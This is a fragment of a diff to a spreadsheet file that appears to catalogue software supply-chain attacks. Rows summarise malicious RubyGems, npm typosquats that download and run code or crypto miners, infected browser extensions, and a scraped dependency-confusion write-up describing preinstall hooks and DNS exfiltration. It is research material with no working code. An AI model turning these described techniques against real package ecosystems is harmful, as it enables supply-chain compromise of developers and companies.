'state', 'supply', 'chain', 'discussion', 'state', 'software', 'supply', 'chain', 'webinar', 'gartner', 'guidance', 'software', 'supply', 'chain', 'risk', 'tag', 'appsec', 'supply', 'chain', 'blog', 'post', 'supply', 'chain', 'software', 'supply', 'chain', 'number', 'stat', 'state', 'software', 'supply', 'chain', 'recent', 'research', 'survey', 'application', 'development', 'pro', 'research', 'suspicious', 'nuget', 'package', 'data', 'industrial', 'system', 'long', 'driver', 'malicious', 'cyber', 'campaign', 'research', 'team', 'suspicious', 'sqzrframework480', 'campaign', 'devsecop', 'language', 'insight', 'lesson', 'memory', 'safety', 'stubborn', 'dangerous', 'software', 'weakness', 'insight', 'takeaway', 'issue', 'topic', 'blog', 'post', 'supply', 'chain', 'research', 'operation', 'product', 'technology', 'company', 'event', 'linkedin', 'subscribe', 'good', 'blog', 'inbox', 'weekly', 'date', 'trend', 'analysis', 'good', 'practice', 'intelligence', 'software', 'supply', 'chain', 'special', 'report', 'state', 'software', 'supply', 'chain', 'late', 'blog', 'post', 'medical', 'device', 'conversation', 'software', 'supply', 'chain', 'graduate', 'software', 'supply', 'chain', 'glassboard', 'conversation', 'field', 'software', 'package', 'deconstruction', 'video', 'conferencing', 'software', 'risk', 'software', 'supply', 'chain', 'software', 'supply', 'chain', 'hotline', 'immediate', 'assistance', 'software', 'supply', 'chain', 'issue', 'contact', 'response', 'blog', 'webinar', 'demo', 'video', 'news', 'glossary', 'career', 'contact', 'privacy', 'policy', 'cookie', 'right']</t>
         </is>
       </c>
     </row>
@@ -4511,17 +3897,12 @@
       </c>
       <c r="C157" t="inlineStr">
         <is>
-          <t>skip content toggle navigation sign product actions automate workflow packages host manage packages find vulnerabilities codespaces instant environments copilot write better code code review manage code changes issues plan track work discussions collaborate outside code explore features documentation github skills blog solutions enterprise teams startups education solution cicd automation devops devsecops resources learning pathways white papers ebooks webinars customer stories partners open source github sponsors fund open source developers readme project github community articles repositories topics trending collections pricing search jump search code repositories users issues pull requests search clear search syntax tips provide feedback read every piece feedback take input seriously include email address contacted cancel submit feedback saved searches saved searches filter results quickly name query available qualifiers documentation cancel create saved search sign sign signed another window reload refresh session signed another window reload refresh session switched accounts another window reload refresh session dismiss alert rubygems rubygemsorg public notifications fork star code issues pull requests discussions actions wiki insights additional navigation options code issues pull requests discussions actions wiki insights gems yanked accounts locked jump bottom aditya prakash edited page revisions select scenarios published could yanked account locked rubygemsorg team members creates backdoor remote code execution steals sensitive information host like http cookies contains code malware wiki document yanked gems accounts locked along rationale action account locked petergibbons2 yanked httpsrubygemsorggemsprettycolorversions081 reason obfuscated code beautification matching malware code httpsgithubcom365sectwannacryblobmasterwannacryvbs account locked mikejudge yanked httpsrubygemsorggemsrubybitcoinversions0020 reason obfuscated code beautification matching malware code httpsgithubcom365sectwannacryblobmasterwannacryvbs february accounts locked petergibbons jimcarrey yanked httpsgistgithubcomcolbyswandale11dadff435b02f887fc68178cd4fb0dc april yanked related httpsgithubcomrubygemsrubygemsorgissues1959 scriptyankgem yanking honeybadger initializing honeybadger error tracker ruby ship version460 frameworkrails level1 pid1361 yanking newer version available please upgrade ruby done yanked basicauthable related httpshelprubygemsorgdiscussionsproblems37137 yanking basicauthable done accounts locked davidspade mclovin mwmanning yanked restclient related httpsgithubcomrubygemsrubygemsorgissues2097 scriptyankuser mclovin yanking bitcoinvanity yanking litacoin yanking comingsoon yanking omniauthamazon scriptyankuser davidspade yanking cronparser yanking coinbase yanking blockchainwallet yanking awesomebot yanking dogecoin yanking capistranocolors july account locked homografo gems yanked gems shaggy owner reason names invalid levenshtein rule related httpsgistgithubcomsonalkr1320af1746c14b42a41e01d20fffbed585b june account locked shaggy gems yanked gems shaggy owner reason gems contain code crypto mining cookiepassword stealing related rubygemsrubygemsorg2034 june account locked cryptice yanked versions passen reason latest version passen code cookie stealing related helprubygemsorg36541 toggle tagle contents pages home brainstorming contribution guidelines create development setup gems yanked accounts locked february april july june june help standup gemcutter owner problem webhooks ideas clone wiki locally footer github footer navigation terms privacy status docs contact manage cookies share personal information can’t perform action time</t>
+          <t>Ruby gem pretty_color contained obfuscated code on beautification was matching malware code https://github.com/365sec/twannacry/blob/master/wannacry.vbs</t>
         </is>
       </c>
       <c r="D157" t="inlineStr">
         <is>
           <t>https://github.com/rubygems/rubygems.org/wiki/Gems-yanked-and-accounts-locked#14-dec-2020</t>
-        </is>
-      </c>
-      <c r="E157" t="inlineStr">
-        <is>
-          <t>['toggle', 'navigation', 'sign', 'product', 'action', 'workflow', 'package', 'host', 'manage', 'package', 'vulnerability', 'codespace', 'instant', 'environment', 'copilot', 'well', 'code', 'code', 'review', 'code', 'change', 'issue', 'track', 'work', 'discussion', 'code', 'documentation', 'skill', 'blog', 'solution', 'enterprise', 'team', 'startup', 'education', 'solution', 'cicd', 'automation', 'devsecop', 'resource', 'pathway', 'white', 'paper', 'ebook', 'customer', 'story', 'partner', 'source', 'sponsor', 'open', 'source', 'developer', 'project', 'community', 'article', 'repository', 'topic', 'collection', 'pricing', 'search', 'jump', 'search', 'code', 'repository', 'user', 'issue', 'request', 'clear', 'search', 'syntax', 'tip', 'feedback', 'piece', 'feedback', 'input', 'email', 'address', 'submit', 'feedback', 'search', 'search', 'filter', 'result', 'query', 'available', 'qualifier', 'documentation', 'search', 'sign', 'sign', 'window', 'reload', 'refresh', 'session', 'window', 'reload', 'refresh', 'session', 'account', 'window', 'reload', 'refresh', 'session', 'alert', 'rubygem', 'public', 'notification', 'star', 'issue', 'request', 'discussion', 'action', 'wiki', 'insight', 'additional', 'navigation', 'option', 'code', 'issue', 'request', 'discussion', 'action', 'wiki', 'insight', 'gem', 'account', 'jump', 'bottom', 'aditya', 'prakash', 'page', 'revision', 'scenario', 'account', 'rubygemsorg', 'team', 'member', 'backdoor', 'remote', 'code', 'execution', 'sensitive', 'information', 'host', 'http', 'cookie', 'code', 'malware', 'document', 'gem', 'account', 'rationale', 'action', 'account', 'reason', 'code', 'beautification', 'account', 'reason', 'code', 'beautification', 'account', 'petergibbon', 'jimcarrey', 'scriptyankgem', 'honeybadger', 'honeybadger', 'error', 'pid1361', 'new', 'version', 'available', 'basicauthable', 'basicauthable', 'account', 'restclient', 'bitcoinvanity', 'litacoin', 'yanking', 'comingsoon', 'cronparser', 'coinbase', 'dogecoin', 'yanking', 'capistranocolor', 'account', 'homografo', 'gem', 'gem', 'owner', 'reason', 'invalid', 'account', 'shaggy', 'gem', 'gem', 'owner', 'reason', 'gem', 'code', 'mining', 'account', 'cryptice', 'version', 'passen', 'reason', 'late', 'version', 'code', 'cookie', 'toggle', 'content', 'page', 'home', 'brainstorming', 'contribution', 'guideline', 'development', 'setup', 'gem', 'account', 'idea', 'term', 'privacy', 'status', 'doc', 'contact', 'cookie', 'personal', 'information', 'action', 'time']</t>
         </is>
       </c>
     </row>
@@ -4538,17 +3919,12 @@
       </c>
       <c r="C158" t="inlineStr">
         <is>
-          <t>emma mcgowan skip main content close home home products mobile phone protection business business protect business avast partners partners partner avast boost business careers investors media contact blogs academy blog decoded forum worldwide english home free antivirus basic protection devices free antivirus basic protection devices free antivirus basic protection devices free antivirus basic protection devices premium complete protection internet threats ultimate best privacy performance apps package looking product device free antivirus free android free free iphoneipad looking product device free antivirus free free android free iphoneipad privacy secureline encrypt connection stay safe public networks antitrack disguise digital fingerprint avoid personalized secure browser enjoy safer browsing that’s faster breachguard protect personal info exposed sold performance cleanup premium boost computer’s speed performance cleanup premium boost computer’s speed performance cleanup premium boost computer’s speed performance cleanup premium boost computer’s speed performance driver updater automatically update drivers single click battery saver maximize battery life store home support store account business solutions endpoint protection small businesses safeguard data devices apps nextgen antivirus patch management cloud backup allinone protection medium large businesses endpoint protection backup recovery endpoint optimization cloud network business platform advanced allinone protection channel partners msps resellers distributors endpoint protection cloud network cloudcare platform sure solution right business help choose business partners become partner partners reseller partners distributor partners affiliates partner locator resources trials store home contact sales support store account business cloudcare reseller portal partners smart life mobile intelligence knowledge center avast careers privacy privacy expert guides privacy blogs blog avast news business covid19 scams diversity inclusion elders privacy sandwich generation news research tips advice press center press releases events news media materials contacts investors story glance strategy technology expertise leadership history investors overview growth competitive advantage information regulatory news share price tools corporate governance investor contacts financial calendar results reports presentations analyst consensus shareholder information contact awards diversity inclusion diversity inclusion accessibility contact blogs avast blog read recent news world avast academy expert tips guides digital privacy avast decoded indepth technical articles regarding threats avast forum discuss community list available regions main regions worldwide english europe english américa latina español americas argentina brasil canada english canada français chile colombia eeuu español méxico english américa latina español europe middle east africa belgië nederlands belgique français česká republika danmark deutschland españa france italia magyarország nederland norge polska portugal schweiz deutsch slovensko česky south africa suisse français suomi sverige türkiye united arab emirates united kingdom ελλάδα ישראל казахстан românia россия україна українська украина русский المملكة العربية السعودية الدول العربية europe english asia pacific australia india इंडिया हिंदी indonesia english indonesia bahasa indonesia malaysia english malaysia bahasa melayu zealand philippines english pilipinas filipino singapore việt 대한민국 简体中文 繁體中文 ประเทศไทย worldwide english close sections business avast news news tips advice viewpoints privacy research diversity inclusion diversity inclusion blog authors visit avast website change language english deutsch čeština español français polski português русский avast blog thirdparty extensions facebook instagram others infected millions thirdparty extensions facebook instagram others infected millions emma mcgowan extensions internet’s popular platforms contain malicious software uninstalled browser extensions usually useful sometimes occasionally dangerous that’s case least browser extensions analyzed avast intelligence researchers identified czech researchers cznic affected extensions contain malware include video downloader facebook vimeo video downloader instagram story downloader unblock well additional browser extensions google chrome microsoft edge according browser store download numbers three million people affected worldwide “our hypothesis either extensions deliberately created malware built author waited extensions become popular pushed update containing malware” avast researcher rubin says could also author sold original extensions someone else creating client introduced malware afterwards” infected javascriptbased extensions contain malicious code makes possible download even malware person’s computer also manipulate links victims click downloading extensions example links google search leads users seemingly random sites includes phishing sites believe domains owned cybercriminals owners domains cybercriminals every redirection” rubin says clicking links also causes extensions send information attacker’s control server creating clicks sent thirdparty websites used collect personal information user including birth date email addresses device information first sign time last login time name device operating system browser used version address avast intelligence team started monitoring november believe could active years without anyone noticing fact reviews chrome store mentioning link hijacking back december means it’s possible infecting people’s devices much longer researchers aware time publishing infected extensions still available download suspect might downloaded avast researchers recommend disabling uninstalling immediately scan remove malware also reported issue microsoft google looking related articles subscribe newsletter subscribe popular video accept cookies recipe online privacy holiday season discord’s ‘family center’ help protect child hidden pitfalls travel apps avast researchers uncover disturbing crowdfunding scheme essential cybersecurity checklist safe summer travel never miss news follow copyright avast software sitemap privacy policy</t>
+          <t>At least 28 browser extensions for Google Chrome and Microsoft Edge analyzed by Avast Threat Intelligence researchers contain malware. According to the browser store download numbers, more than three million people may be affected worldwide.</t>
         </is>
       </c>
       <c r="D158" t="inlineStr">
         <is>
           <t>https://blog.avast.com/malicious-browser-extensions-avast</t>
-        </is>
-      </c>
-      <c r="E158" t="inlineStr">
-        <is>
-          <t>['main', 'content', 'close', 'home', 'home', 'product', 'mobile', 'phone', 'protection', 'business', 'business', 'business', 'avast', 'partner', 'partner', 'partner', 'avast', 'boost', 'business', 'career', 'investor', 'medium', 'contact', 'blog', 'blog', 'free', 'basic', 'protection', 'device', 'free', 'antivirus', 'basic', 'protection', 'device', 'free', 'antivirus', 'basic', 'protection', 'device', 'free', 'antivirus', 'basic', 'protection', 'device', 'premium', 'complete', 'protection', 'internet', 'threat', 'good', 'privacy', 'performance', 'app', 'product', 'device', 'free', 'antivirus', 'free', 'free', 'iphoneipad', 'product', 'device', 'free', 'antivirus', 'secureline', 'connection', 'safe', 'public', 'network', 'antitrack', 'digital', 'fingerprint', 'secure', 'browser', 'safe', 'fast', 'breachguard', 'personal', 'info', 'performance', 'cleanup', 'premium', 'boost', 'computer', 'speed', 'performance', 'cleanup', 'premium', 'boost', 'computer', 'speed', 'performance', 'cleanup', 'premium', 'boost', 'computer', 'speed', 'performance', 'cleanup', 'premium', 'boost', 'computer', 'speed', 'performance', 'driver', 'updater', 'driver', 'single', 'click', 'battery', 'saver', 'battery', 'life', 'store', 'home', 'support', 'store', 'account', 'business', 'solution', 'endpoint', 'protection', 'small', 'business', 'data', 'device', 'app', 'protection', 'medium', 'large', 'business', 'endpoint', 'recovery', 'endpoint', 'optimization', 'network', 'business', 'platform', 'advanced', 'allinone', 'protection', 'channel', 'partner', 'msps', 'reseller', 'distributor', 'endpoint', 'network', 'cloudcare', 'platform', 'sure', 'solution', 'right', 'business', 'help', 'business', 'partner', 'partner', 'partner', 'reseller', 'partner', 'distributor', 'partner', 'partner', 'locator', 'resource', 'trial', 'home', 'contact', 'sale', 'support', 'store', 'account', 'business', 'cloudcare', 'reseller', 'portal', 'partner', 'smart', 'life', 'mobile', 'intelligence', 'knowledge', 'center', 'avast', 'career', 'privacy', 'privacy', 'expert', 'privacy', 'blog', 'avast', 'news', 'business', 'scam', 'diversity', 'inclusion', 'elder', 'privacy', 'sandwich', 'generation', 'news', 'research', 'tip', 'advice', 'press', 'center', 'press', 'release', 'event', 'news', 'media', 'material', 'contact', 'investor', 'story', 'glance', 'strategy', 'technology', 'expertise', 'leadership', 'history', 'investor', 'growth', 'competitive', 'advantage', 'information', 'regulatory', 'news', 'share', 'price', 'tool', 'corporate', 'governance', 'investor', 'contact', 'financial', 'calendar', 'result', 'presentation', 'analyst', 'consensus', 'shareholder', 'information', 'contact', 'award', 'diversity', 'inclusion', 'diversity', 'inclusion', 'accessibility', 'contact', 'blog', 'avast', 'blog', 'recent', 'news', 'world', 'avast', 'academy', 'expert', 'tip', 'digital', 'privacy', 'avast', 'indepth', 'technical', 'article', 'threat', 'avast', 'community', 'list', 'available', 'region', 'main', 'region', 'ประเทศไทย', 'section', 'avast', 'news', 'news', 'tip', 'advice', 'viewpoint', 'privacy', 'research', 'diversity', 'inclusion', 'inclusion', 'blog', 'author', 'avast', 'website', 'change', 'language', 'avast', 'blog', 'thirdparty', 'extension', 'other', 'million', 'thirdparty', 'extension', 'other', 'million', 'extension', 'internet', 'popular', 'platform', 'malicious', 'software', 'browser', 'extension', 'useful', 'dangerous', 'case', 'least', 'browser', 'extension', 'avast', 'intelligence', 'researcher', 'czech', 'researcher', 'cznic', 'affected', 'extension', 'malware', 'video', 'downloader', 'facebook', 'vimeo', 'video', 'downloader', 'story', 'downloader', 'unblock', 'additional', 'browser', 'extension', 'people', 'hypothesis', 'extension', 'malware', 'author', 'extension', 'popular', 'update', 'malware', 'avast', 'author', 'original', 'extension', 'client', 'javascriptbased', 'extension', 'malicious', 'code', 'possible', 'download', 'malware', 'person', 'computer', 'link', 'victim', 'extension', 'example', 'link', 'search', 'user', 'random', 'site', 'phishing', 'site', 'domain', 'cybercriminal', 'owner', 'cybercriminal', 'redirection', 'clicking', 'link', 'extension', 'information', 'attacker', 'control', 'server', 'click', 'thirdparty', 'website', 'personal', 'information', 'user', 'birth', 'date', 'email', 'address', 'device', 'information', 'time', 'last', 'login', 'time', 'name', 'device', 'operating', 'system', 'browser', 'version', 'address', 'avast', 'intelligence', 'team', 'active', 'year', 'fact', 'review', 'chrome', 'store', 'link', 'hijacking', 'possible', 'people', 'device', 'long', 'researcher', 'aware', 'time', 'extension', 'available', 'download', 'suspect', 'avast', 'researcher', 'uninstalling', 'issue', 'article', 'newsletter', 'popular', 'video', 'cookie', 'online', 'privacy', 'holiday', 'season', 'discord', 'family', 'center', 'help', 'child', 'pitfall', 'app', 'avast', 'researcher', 'crowdfunding', 'scheme', 'essential', 'cybersecurity', 'checklist', 'safe', 'summer', 'travel', 'news', 'follow', 'copyright', 'avast', 'software', 'sitemap', 'privacy', 'policy']</t>
         </is>
       </c>
     </row>
@@ -4565,17 +3941,12 @@
       </c>
       <c r="C159" t="inlineStr">
         <is>
-          <t>skip navigation back platform platform overview automate software supply chain sonatype repository firewall block malicious open source door sonatype nexus repository build fast centralized components sonatype lifecycle control open source risk across sdlc sonatype sbom manager simplify sbom compliance monitoring integrations work tools languages packages already solutions integrated innovation align teams fuel secure deployment developers deliver quality code fast application manage vulnerability risks legal compliance enforce policy scale industry government financial services manufacturing technology healthcare pricing resources resources featured devops downloads webinar series featured state software supply chain blog webinars whitepapers ebooks launchpad customer stories free tools sonatype repository sonatype vulnerability scanner sonatype index customer resources training workshops documentation support partners become partner join extensive sonatype partner network find partner find connect certified sonatype partner company explore software supply chain management story careers innovate us—explore opportunities sonatype events attend inperson virtual learning events newsroom keep date sonatype news contact let’s talk software supply chain book demo book demo book demo cursedgrabber strikes sonatype spots malware campaign software supply chains january sonatype research team minute read time share january sonatype became aware three malicious packages published leveraged brandjacking typosquatting techniques previously warned names packages package versions published an0nchatlib scp173deleted discordfix scp173deleted sonatype scp173deleted sonatypes research team also determined actors authored packages authors cursedgrabber discord malware family discovered sonatype november packages contain variations discord token stealing code discord malware discovered sonatype numerous occasions said sonatype researcher sharma technical analysis malware campaign detection analysis malicious packages detected sonatypes research team leveraging sonatype intelligence research service analyzing packages closely research team confirmed packages pose risk gathered clear evidence malware campaign using discord generate fake download counts packages make appear popular potential users simultaneously research efforts notified remove malicious components repository publishing still available download well update piece github removed vulnerability versions packages malicious tracked sonatypes vulnerability identifier sonatype20210045 image three malicious component components published cursedgrabber malware creators customer impact based visibility none packages downloaded sonatype customers customers remain protected potential software supply chain attacks arising malicious counterfeit packages like stated sharma findings reiterate software supply chain attacks become common underscore crucial organizations protect attacks continuously improve strategies sonatypes worldclass research data combined automated malware detection technology safeguards developers customers software supply chain infections fact sonatype working others cybersecurity research community identified increase upstream software supply chain attacks past year open source software component downloads surpassing trillion companies developers longer rely manual reviews analysis tracking protect similar software supply chain attacks youre sonatype customer want find open source software components using known vulnerable sonatypes free sonatype vulnerability scanner available sonatype vulnerability scanner analyze application within seconds produce software bill materials sbom detailing quality open source component used therein visit nexus intelligence insights page deep dive vulnerabilities like subscribe automatically receive sonatype intelligence insights press tags vulnerabilities featured product nexus intelligence insights written sonatype research team sonatypes research team comprised world class professionals years experience team focused bringing realtime indepth intelligence actionable information open source third party vulnerabilities sonatype customers author posts topic posts cursedgrabber strikes sonatype spots malware campaign software supply chains sonatype research team sonatype stops software supply chain attack aimed java developer community sonatype research team cve202017479 return validation bypass cve201919507 sonatype research team overload unveiling hidden crisis vulnerability management vulnerabilities packages spread bladeroid cryptostealer hijack instagram vulnerabilities exploited ivanti connect ssrf vulnerability traced back xmltooling library vulnerabilities secure software supply chain explore platform started platform overview firewall repository lifecycle sbom manager integrations pricing products container auditor advanced legal pack lifecycle foundation solutions role integrated innovation developers application legal compliance industry government financial services manufacturing technology healthcare community free tools nexus repository sonatype vulnerability scanner sonatype index resources launchpad log4j updates blog whitepapers ebooks webinars customer stories partners find partner become partner amazon services openshift customer portal training workshops documentation sonatype customer support company careers newsroom investors contact press trust center subscribe latest software news events terms service privacy policy modern slavery statement event terms conditions sell personal information copyright 2008present sonatype rights reserved includes thirdparty code listed sonatype sonatype nexus trademarks sonatype apache maven maven trademarks apache software foundation m2eclipse trademark eclipse foundation trademarks property respective owners</t>
+          <t>Sonatype identified 3 malicious packages that were published to npm, and leveraged brandjacking and typosquatting techniques to propagate discord token grabbing malware.</t>
         </is>
       </c>
       <c r="D159" t="inlineStr">
         <is>
           <t>https://blog.sonatype.com/sonatype-spots-more-discord-malware-in-npm?hs_preview=BbDPGbfh-40737456755:</t>
-        </is>
-      </c>
-      <c r="E159" t="inlineStr">
-        <is>
-          <t>['navigation', 'back', 'platform', 'platform', 'overview', 'automate', 'software', 'supply', 'chain', 'sonatype', 'repository', 'firewall', 'block', 'malicious', 'open', 'source', 'door', 'sonatype', 'repository', 'fast', 'component', 'lifecycle', 'control', 'open', 'source', 'risk', 'manager', 'compliance', 'monitoring', 'work', 'tool', 'language', 'package', 'solution', 'innovation', 'align', 'team', 'secure', 'deployment', 'developer', 'quality', 'code', 'fast', 'application', 'vulnerability', 'risk', 'legal', 'compliance', 'enforce', 'policy', 'scale', 'industry', 'government', 'financial', 'service', 'manufacturing', 'technology', 'healthcare', 'pricing', 'resource', 'resource', 'download', 'webinar', 'series', 'state', 'software', 'supply', 'chain', 'blog', 'webinar', 'whitepaper', 'launchpad', 'customer', 'story', 'free', 'tool', 'repository', 'sonatype', 'vulnerability', 'scanner', 'sonatype', 'index', 'customer', 'resource', 'training', 'workshop', 'documentation', 'support', 'partner', 'partner', 'extensive', 'sonatype', 'partner', 'network', 'partner', 'connect', 'sonatype', 'partner', 'company', 'software', 'supply', 'chain', 'management', 'story', 'career', 'opportunity', 'event', 'virtual', 'learning', 'event', 'newsroom', 'date', 'sonatype', 'news', 'contact', 'talk', 'software', 'supply', 'chain', 'book', 'demo', 'book', 'demo', 'book', 'demo', 'cursedgrabber', 'strike', 'sonatype', 'spot', 'campaign', 'software', 'supply', 'chain', 'sonatype', 'research', 'team', 'minute', 'time', 'share', 'sonatype', 'aware', 'malicious', 'package', 'leveraged', 'brandjacking', 'typosquatting', 'technique', 'name', 'package', 'package', 'version', 'discordfix', 'sonatype', 'sonatype', 'research', 'team', 'actor', 'package', 'author', 'sonatype', 'package', 'variation', 'discord', 'code', 'discord', 'numerous', 'occasion', 'technical', 'malware', 'campaign', 'detection', 'analysis', 'malicious', 'package', 'sonatype', 'research', 'team', 'sonatype', 'intelligence', 'research', 'service', 'package', 'research', 'team', 'package', 'risk', 'clear', 'evidence', 'campaign', 'discord', 'fake', 'download', 'package', 'popular', 'potential', 'user', 'effort', 'malicious', 'component', 'repository', 'available', 'download', 'piece', 'vulnerability', 'version', 'package', 'malicious', 'sonatype', 'vulnerability', 'image', 'malicious', 'component', 'component', 'cursedgrabber', 'creator', 'customer', 'impact', 'visibility', 'none', 'package', 'sonatype', 'customer', 'customer', 'potential', 'software', 'supply', 'chain', 'attack', 'malicious', 'counterfeit', 'package', 'finding', 'software', 'supply', 'chain', 'attack', 'common', 'underscore', 'crucial', 'organization', 'attack', 'strategy', 'sonatype', 'worldclass', 'research', 'datum', 'malware', 'detection', 'technology', 'developer', 'customer', 'software', 'supply', 'chain', 'infection', 'fact', 'other', 'cybersecurity', 'research', 'community', 'upstream', 'software', 'supply', 'chain', 'attack', 'year', 'open', 'source', 'software', 'component', 'download', 'company', 'developer', 'manual', 'review', 'analysis', 'tracking', 'similar', 'software', 'supply', 'chain', 'attack', 'sonatype', 'customer', 'open', 'source', 'software', 'component', 'vulnerable', 'sonatype', 'free', 'sonatype', 'vulnerability', 'scanner', 'available', 'sonatype', 'vulnerability', 'scanner', 'application', 'second', 'software', 'bill', 'material', 'sbom', 'quality', 'open', 'source', 'component', 'nexus', 'intelligence', 'insight', 'deep', 'dive', 'vulnerability', 'subscribe', 'sonatype', 'intelligence', 'insight', 'press', 'tag', 'vulnerability', 'product', 'nexus', 'intelligence', 'insight', 'sonatype', 'research', 'team', 'sonatype', 'research', 'team', 'world', 'class', 'professional', 'year', 'experience', 'team', 'realtime', 'indepth', 'intelligence', 'actionable', 'information', 'open', 'source', 'third', 'party', 'vulnerability', 'customer', 'author', 'topic', 'post', 'strike', 'sonatype', 'spot', 'campaign', 'software', 'supply', 'chain', 'research', 'team', 'sonatype', 'software', 'supply', 'chain', 'attack', 'sonatype', 'research', 'team', 'validation', 'bypass', 'cve201919507', 'sonatype', 'research', 'team', 'overload', 'crisis', 'vulnerability', 'management', 'package', 'vulnerability', 'connect', 'ssrf', 'vulnerability', 'vulnerability', 'software', 'supply', 'chain', 'platform', 'platform', 'overview', 'firewall', 'repository', 'lifecycle', 'sbom', 'manager', 'pricing', 'product', 'container', 'auditor', 'legal', 'pack', 'lifecycle', 'foundation', 'solution', 'role', 'innovation', 'developer', 'legal', 'compliance', 'industry', 'government', 'financial', 'service', 'manufacturing', 'technology', 'healthcare', 'community', 'free', 'tool', 'nexus', 'repository', 'sonatype', 'vulnerability', 'scanner', 'sonatype', 'index', 'resource', 'update', 'blog', 'whitepaper', 'ebook', 'customer', 'story', 'partner', 'partner', 'partner', 'amazon', 'customer', 'portal', 'training', 'workshop', 'documentation', 'sonatype', 'customer', 'support', 'company', 'career', 'newsroom', 'contact', 'press', 'center', 'late', 'software', 'news', 'event', 'term', 'service', 'privacy', 'policy', 'modern', 'slavery', 'statement', 'event', 'term', 'condition', 'personal', 'information', 'copyright', 'sonatype', 'right', 'thirdparty', 'code', 'sonatype', 'sonatype', 'nexus', 'trademark', 'sonatype', 'trademark', 'foundation', 'trademark', 'property', 'respective', 'owner']</t>
         </is>
       </c>
     </row>
@@ -4592,17 +3963,12 @@
       </c>
       <c r="C160" t="inlineStr">
         <is>
-          <t>skip content package search sign teams pricing documentation search sign sign found advisory found footer support help advisories status contact company blog press terms policies policies terms code conduct privacy</t>
+          <t>All versions of http-proxy-middelware contain malicious code. The index.js file attempts to download a file from a remote server and execute it. The file is not run upon installation - the package needs to be required or the index.js run manually.</t>
         </is>
       </c>
       <c r="D160" t="inlineStr">
         <is>
           <t>https://www.npmjs.com/advisories/1599</t>
-        </is>
-      </c>
-      <c r="E160" t="inlineStr">
-        <is>
-          <t>['content', 'package', 'search', 'sign', 'team', 'documentation', 'search', 'sign', 'sign', 'advisory', 'footer', 'support', 'help', 'advisory', 'status', 'contact', 'company', 'blog', 'press', 'term', 'policy', 'policy', 'term', 'code', 'conduct', 'privacy']</t>
         </is>
       </c>
     </row>
@@ -4619,17 +3985,12 @@
       </c>
       <c r="C161" t="inlineStr">
         <is>
-          <t>skip content package search sign teams pricing documentation search sign sign found advisory found footer support help advisories status contact company blog press terms policies policies terms code conduct privacy</t>
+          <t>All versions of jquerry contain malicious code. The index.js file appears to download and execute a crypto mining script. The file is not run upon installation - the package needs to be required or the index.js run manually.</t>
         </is>
       </c>
       <c r="D161" t="inlineStr">
         <is>
           <t>https://www.npmjs.com/advisories/1600</t>
-        </is>
-      </c>
-      <c r="E161" t="inlineStr">
-        <is>
-          <t>['content', 'package', 'search', 'sign', 'team', 'documentation', 'search', 'sign', 'sign', 'advisory', 'footer', 'support', 'help', 'advisory', 'status', 'contact', 'company', 'blog', 'press', 'term', 'policy', 'policy', 'term', 'code', 'conduct', 'privacy']</t>
         </is>
       </c>
     </row>
@@ -4646,17 +4007,12 @@
       </c>
       <c r="C162" t="inlineStr">
         <is>
-          <t>open sign sign write sign sign dependency confusion hacked apple microsoft dozens companies story novel supply chain attack alex birsan follow read listen share ever since started learning code fascinated level trust simple command like install packagename programming languages like python come easy less official method installing dependencies projects installers usually tied public code repositories anyone freely upload code packages others probably heard tools already node registry python’s uses pypi python package index ruby’s gems found well rubygems downloading using package sources essentially trusting publisher code machine blind trust exploited malicious actors course none package hosting services ever guarantee code users upload malwarefree past research shown typosquatting attack leveraging typo’d versions popular package names incredibly effective gaining access random across world wellknown dependency chain attack paths include using various methods compromise existing packages uploading malicious code names dependencies longer exist idea attempting hack paypal summer justin gardner rhynorater shared interesting nodejs source code found github code meant internal paypal packagejson file appeared contain public private dependencies public packages well nonpublic package names likely hosted internally paypal names exist public registry time logic dictating package would sourced unclear questions arose happens malicious code uploaded names possible paypal’s internal projects start defaulting public packages instead private ones developers even automated systems start running code inside libraries works bounty would attack work companies without started working plan answer questions idea upload “malicious” node packages registry unclaimed names would “phone home” computer installed packages ended installed paypalowned servers anywhere else matter code inside would immediately notify point feel important make clear every single organization targeted research provided permission tested either public bounty programs private agreements please attempt kind test without authorization “it’s always dns” thankfully allows arbitrary code executed automatically upon package installation allowing easily create node package collects basic information machine installed preinstall script strike balance ability identify organization based data need avoid collecting much sensitive information settled logging username hostname current path unique installation along external enough data help teams identify possibly vulnerable systems based reports avoiding testing mistaken actual attack thing left data back knowing possible targets would deep inside wellprotected corporate networks considered exfiltration sending information server protocol essential test work ensure traffic would less likely blocked detected data hexencoded used part query reached custom authoritative name server either directly intermediate resolvers server configured received query essentially keeping record every machine packages downloaded merrier basic plan attack place time uncover possible targets first strategy looking alternate ecosystems attack ported code python ruby order able upload similar packages pypi python package index rubygems respectively arguably important part test finding many relevant dependency names possible full days searching private package names belonging targeted companies revealed many names could found github well major package hosting services inside internal packages accidentally published even within posts various internet forums however best place find private package names turned inside javascript files apparently quite common internal packagejson files contain names javascript project’s dependencies become embedded public script files build process exposing internal package names similarly leaked internal paths require calls within files also contain dependency names apple yelp tesla examples companies internal names exposed second half thanks streaak help remarkable recon skills able automatically scan millions domains belonging targeted companies extract hundreds additional javascript package names claimed registry uploaded code package hosting services found names waited callbacks results success rate simply astonishing oneoff mistakes made developers machines misconfigured internal cloudbased build servers systemically vulnerable development pipelines thing clear squatting valid internal package names nearly surefire method networks biggest tech companies gaining remote code execution possibly allowing attackers backdoors builds type vulnerability started calling dependency confusion detected inside organizations date across three tested programming languages vast majority affected companies fall employees category likely reflects higher prevalence internal library usage within larger organizations javascript dependency names easier find almost logged callbacks came packages necessarily mean python ruby less susceptible attack fact despite able identify internal ruby names belonging eight organizations searches four companies turned vulnerable dependency confusion rubygems company canadian ecommerce giant shopify whose build system automatically installed ruby named shopifycloud hours uploaded tried code inside shopify team ready within awarded bounty finding issue another reward came apple code node package uploaded august executed multiple machines inside network affected projects appeared related apple’s authentication system externally known apple brought idea allowed actor inject backdoors apple apple consider level impact accurately represented issue stated achieving backdoor operational service requires complex sequence events specific term carries additional connotations however apple confirm remote code execution apple servers would achievable using package technique based flow package installs issue fixed within weeks report bounty awarded less prior publishing post theme packages installed internal servers individual developer’s could observed across several successful attacks companies installs often taking place hours even minutes packages uploaded paypal names started worked resulting another bounty actually majority awarded bounties maximum amount allowed program’s policy sometimes even higher confirming generally high severity dependency confusion bugs affected companies include netflix yelp uber “it’s it’s feature” despite large number dependency confusion findings detail still certain extent unclear happening main root causes behind type vulnerability affected organizations understandably reluctant share technical details root causes mitigation strategies interesting details emerge research communication teams instance main culprit python dependency confusion appears incorrect usage “insecure design” command line argument called extraindexurl using argument install library specify package index find works expected actually behind scenes goes something like checks whether library exists specified internal package index checks whether library exists public package index pypi installs whichever 